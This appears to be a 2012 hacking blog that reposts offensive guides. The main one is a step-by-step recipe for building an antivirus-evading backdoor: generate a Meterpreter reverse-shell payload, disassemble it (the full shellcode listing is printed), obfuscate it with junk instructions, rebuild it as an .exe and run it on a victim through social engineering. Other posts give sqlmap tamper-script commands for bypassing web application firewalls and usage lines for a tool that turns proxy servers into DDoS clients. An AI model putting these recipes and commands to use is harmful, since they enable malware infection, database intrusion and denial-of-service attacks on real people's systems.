Feb 18, 2012

Using Metasm To Avoid Antivirus Detection (Ghost Writing ASM)

If you want all the detail, please go to the Source.

1. Create malicious file(backdoor)
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=443 R > raw_binary
$ ./msfvenom --payload windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f raw > raw_binary

2. Copy metasm.rb (ruby library for disassemble file that normally ship with Metasploit ) to metasm folder of environment ruby folder.
$ cd /pentest/exploit/framework/lib/metasm
$ cp -a metasm.rb metasm /usr/lib/ruby/1.9.2

3. Disassemble it
$ ruby /pentest/exploit/framework/lib/metasm/samples/disassemble.rb raw_binary > asm_code.asm

That will create a file called asm_code.asm which should look something like this

cld ; @0 fc
call sub_8fh ; @1 e889000000 x:sub_8fh
pushad ; @6 60
mov ebp, esp ; @7 89e5
xor edx, edx ; @9 31d2
mov edx, fs:[edx+30h] ; @0bh 648b5230 r4:segment_base_fs+30h
mov edx, [edx+0ch] ; @0fh 8b520c r4:unknown
mov edx, [edx+14h] ; @12h 8b5214 r4:unknown
// Xrefs: 8dh
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff
// Xrefs: 2ch
xor eax, eax ; @1eh 31c0
lodsb ; @20h ac
cmp al, 61h ; @21h 3c61
jl loc_27h ; @23h 7c02 x:loc_27h
sub al, 20h ; @25h 2c20
// Xrefs: 23h
ror edi, 0dh ; @27h c1cf0d
add edi, eax ; @2ah 01c7
loop loc_1eh ; @2ch e2f0 x:loc_1eh
push edx ; @2eh 52
push edi ; @2fh 57
mov edx, [edx+10h] ; @30h 8b5210 r4:unknown
mov eax, [edx+3ch] ; @33h 8b423c
add eax, edx ; @36h 01d0
mov eax, [eax+78h] ; @38h 8b4078
test eax, eax ; @3bh 85c0
jz loc_89h ; @3dh 744a x:loc_89h
add eax, edx ; @3fh 01d0
push eax ; @41h 50
mov ecx, [eax+18h] ; @42h 8b4818
mov ebx, [eax+20h] ; @45h 8b5820
add ebx, edx ; @48h 01d3
// Xrefs: 66h
jecxz loc_88h ; @4ah e33c x:loc_88h
dec ecx ; @4ch 49
mov esi, [ebx+4*ecx] ; @4dh 8b348b
add esi, edx ; @50h 01d6
xor edi, edi ; @52h 31ff
// Xrefs: 5eh
xor eax, eax ; @54h 31c0
lodsb ; @56h ac
ror edi, 0dh ; @57h c1cf0d
add edi, eax ; @5ah 01c7
cmp al, ah ; @5ch 38e0
jnz loc_54h ; @5eh 75f4 x:loc_54h
add edi, [ebp-8] ; @60h 037df8
cmp edi, [ebp+24h] ; @63h 3b7d24
jnz loc_4ah ; @66h 75e2 x:loc_4ah
pop eax ; @68h 58
mov ebx, [eax+24h] ; @69h 8b5824
add ebx, edx ; @6ch 01d3
mov cx, [ebx+2*ecx] ; @6eh 668b0c4b
mov ebx, [eax+1ch] ; @72h 8b581c
add ebx, edx ; @75h 01d3
mov eax, [ebx+4*ecx] ; @77h 8b048b
add eax, edx ; @7ah 01d0
mov [esp+24h], eax ; @7ch 89442424
pop ebx ; @80h 5b
pop ebx ; @81h 5b
popad ; @82h 61
pop ecx ; @83h 59
pop edx ; @84h 5a
push ecx ; @85h 51
jmp eax ; @86h ffe0
// Xrefs: 4ah
pop eax ; @88h 58
// Xrefs: 3dh
pop edi ; @89h 5f
pop edx ; @8ah 5a
mov edx, [edx] ; @8bh 8b12 r4:unknown
jmp loc_15h ; @8dh eb86 x:loc_15h
// Xrefs: 1
// function binding: ebp -> dword ptr [esp], esp -> esp-10h
// function ends at 0a0h
pop ebp ; @8fh 5d
push 3233h ; @90h 6833320000
push 5f327377h ; @95h 687773325f
push esp ; @9ah 54
push 726774ch ; @9bh 684c772607
call ebp ; @0a0h ffd5 endsub sub_8fh noreturn
db 0b8h, 90h, 1, 0, 0, 29h, 0c4h, "TPh)", 80h, 6bh, 0 ; @0a2h
db 0ffh, 0d5h, "PPPP@P@Ph", 0eah, 0fh, 0dfh, 0e0h, 0ffh ; @0b0h
db 0d5h, 97h, 6ah, 5, 68h, 0c0h, 0a8h, 1, 64h, 68h, 2, 0, 1, 0bbh, 89h, 0e6h ; @0c0h
db 6ah, 10h, "VWh", 99h, 0a5h, 74h, 61h, 0ffh, 0d5h, 85h, 0c0h, 74h, 0ch, 0ffh ; @0d0h
db 4eh, 8, 75h, 0ech, 68h, 0f0h, 0b5h, 0a2h, 56h, 0ffh, 0d5h, 6ah, 0, 6ah, 4, 56h ; @0e0h
db 57h, 68h, 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 8bh, "6j@h", 0, 10h, 0 ; @0f0h
db 0, 56h, 6ah, 0, 68h, 58h, 0a4h, 53h, 0e5h, 0ffh, 0d5h, 93h, 53h, 6ah, 0, 56h ; @100h
db "SWh", 2, 0d9h, 0c8h, 5fh, 0ffh, 0d5h, 1, 0c3h, 29h, 0c6h, 85h, 0f6h, 75h ; @110h
db 0ech, 0c3h ; @120h

4. Now obfuscate it. From the Source.
For now, we’ll continue with the “spray and pray” methodology. You can add anything you want so long as you don’t break the functionality of the application. I find that simply pushing registers onto the stack and then popping them back off sometimes will do the trick. Also just before a XOR statement (which is often used to set the value of a register to zero) you can add a bunch of random statements to increment and decrement the register, move values of other registers into it. Anything you do won’t matter because eventually you will be changing the value to zero. So using the above example we can change the section beginning with ‘// Xrefs: 8dh’

From This:
// Xrefs: 8dh
mov esi, [edx+28h] ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h] ; @18h 0fb74a26 r2:unknown
xor edi, edi ; @1ch 31ff

To This:
// Xrefs: 8dh
mov esi, [edx+28h]                ; @15h 8b7228 r4:unknown
movzx ecx, word ptr [edx+26h]        ; @18h 0fb74a26 r2:unknown
mov edi, ecx                ; Move the contents of the ECX register into the EDI Register
push edi                    ; Push the EDI register onto the current stack frame
pop edi                    ; Pop it back off
mov edi, ecx                ; Mov ECX back into edi
xor ecx, ecx                ; Zero out the contents of the ECX register
mov ecx, edi                ; Mov EDI back into ECX
xor edi, edi                ; @1ch 31ff

5. Add the following two lines to the top of the file for it to build correctly
.section '.text' rwx

6. Use metasm to build the executionable and package it into the format that windows can run.
$ /pentest/exploits/framework/lib/metasm/samples/peencode.rb asm_code.asm -o coolstuff.exe

7. Now check the file with
$ file coolstuff.exe

8. Run it in the victim with your social engineering skill. Have a nice hack :).

Source: http://www.pentestgeek.com/2012/01/25/using-metasm-to-avoid-antivirus-detection-ghost-writing-asm/

If you like my blog, Please Donate Me

Feb 17, 2012

Recommended Security Application For iOS

All the app that I recommended, you must jailbreak your device. 

Default cydia repo

  • OpenSSH – Allows to connect to the iPhone remotely over SSH
  • Adv-cmds : Comes with a set of process commands like ps, kill, finger…
  • Sqlite3 : Sqlite database client
  • GNU Debugger: For run time analysis & reverse engineering
  • Syslogd : To view iPhone logs
  • Veency: Allows to view the phone on the workstation with the help of veency client
  • Tcpdump: To capture network traffic on phone
  • com.ericasadun.utlities: plutil to view property list files
  • Grep: For searching
  • Odcctools: otool – object file displaying tool
  • Crackulous: Decrypt iPhone apps
  • Hackulous: To install decrypted apps
  • Protect my privacy - protect personal information on your iPhone.
  • Metasploit
  • SET (Social Engineering Tool)
  • Nikto2 (depends on Perl(which takes a lot of space on root partition))
  • Stealth Mac
  • Inguma
  • Slow loris
  • Pentbox 1.4
  • Netcat
  • iPwn
  • Ettercap-ng
  • dsniff
  • danaus plexippus
  • iAHT
  • Nmap
Source: https://securitylearn.wordpress.com/2012/02/07/useful-cydia-apps-for-pentesting/

If you like my blog, Please Donate Me

Bypassing Web Application Firewalls with SQLMap Tamper Scripts

The focus of the tamper scripts is to modify the request in a way that will evade the detection of the WAF (Web Application Firewall) rules. In some cases, you might need to combine a few tamper scripts together in order to fool the WAF. For a complete list of the tamper scripts, you can refer to https://svn.sqlmap.org/sqlmap/trunk/sqlmap/tamper/
The first scripts I’ll demonstrate are space2hash.py and space2morehash.py which work with MySQL (still haven't gotten around to the MSSQL one). These scripts will convert all spaces to block comments with random text. The extended version of the script (space2morehash.py) will also add the comments in between certain function names and the parenthesis.
To get started using the tamper scripts, you use the --tamper switch followed by the script name. In my example I'm using the following command:
./sqlmap.py -u -v 3 --dbms "MySQL" --technique U -p id --batch --tamper "space2morehash.py"
Figure 1: space2morehash.py tamper script in action

As shown in figure 1, the tamper script replaces the spaces in the injection with %23randomText%0A, which is of course URL encoded. The function's CHAR(), USER(), CONCAT() get changed to FUNCTION%23randomText%0A() since they aren't blacklisted in IGNORE_SPACE_AFFECTED_KEYWORDS. This is because of MySQL's Function Name Parsing and Resolution and how it treats function calls and identifiers.
Another two scripts that transform spaces are space2mssqlblank.py and space2mysqlblank.py. MySQL allows characters 09, 0A-0D, A0 to be used as whitespaces while MSSQL allows a much wider range, from 01-1F.
Figure 2: space2mssqlblank.py using different characters as whitespaces

Next up we have a few scripts that mess around with the encoding: charencode.py and chardoubleencode.py. These are useful to bypass different keyword filters, for example when table_name is being detected and there is no way around it.
Figure 3: charencode.py can be used to evade keyword detection

If the application URL decodes the request for some reason (some do), the chardoubleencode.py script can come in handy.
Figure 4: chardoubleencode.py can be used when the application decodes the request

Additionally, if the application is programmed in ASP/ASP.NET, the charunicodeencode.py and percentage.py scripts can be used to hide the true payload.
Figure 5: charunicodeencode.py obfuscating the injection with Unicode encoding

An interesting characteristic of ASP is the ability to add as many percentage signs as you want in between characters. For example, AND 1=%%%%%%%%1 is completely valid!
Figure 6: Percent signs in between each character is valid in ASP
Source: http://websec.ca/blog/view/Bypassing_WAFs_with_SQLMap

If you like my blog, Please Donate Me

Feb 13, 2012

Barrelroll - Make Proxy Server to DDoS Clients

This program makes proxy servers into DDoS clients. Use only for educational and research purposes. 


-> pycurl
-> python 2.3


$ ./barrelroll.py [ip] [host] [forks]


$ ./barrelroll.py google.com 30 < full_list/_full_list.txt
$ ./barrelroll.py google.com 30 < full_list/us.txt

If you like my blog, Please Donate Me

Feb 12, 2012

Adding More Pentesting Tools for BackTrack 5

If you want the detail and list of tools, please go to the source.

1. Download the script
- svn checkout http://bt5-fixit.googlecode.com/svn/trunk/ bt5-fixit
2. Go into folder and change mode of script
- cd bt5-fixit
- chmod +x bt5-fixit.sh
3. Run it and check what you got.
- ./bt5-fixit.sh

Source: http://www.theprojectxblog.net/improving-and-adding-more-pentesting-tools-for-backtrack-5/

If you like my blog, Please Donate Me